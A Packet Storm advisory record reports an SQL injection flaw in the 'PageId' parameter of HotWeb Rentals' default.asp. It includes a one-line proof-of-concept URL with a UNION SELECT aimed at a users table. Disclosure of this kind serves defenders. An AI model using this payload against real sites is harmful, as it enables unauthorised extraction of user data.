HotWeb Rental SQL Injection

2010-12-29T00:00:00
ID PACKETSTORM:97150
Type packetstorm
Reporter non-customers
Modified 2010-12-29T00:00:00

Description

                                        
                                            `HotWeb Rentals "PageId" SQL Injection Vulnerability  
  
PRODUCT >>> http://www.hotwebscripts.co.uk/  
  
Input passed to the "PageId" parameter in default.asp is not properly sanitised before being used in  
SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.  
  
POC >>> default.asp?PageId=-15+union+select+11,22,33,44,55,66,77,88,99+from+users  
  
--   
non-customers crew | http://rock-madrid.com/  
  
  
  
  
--   
`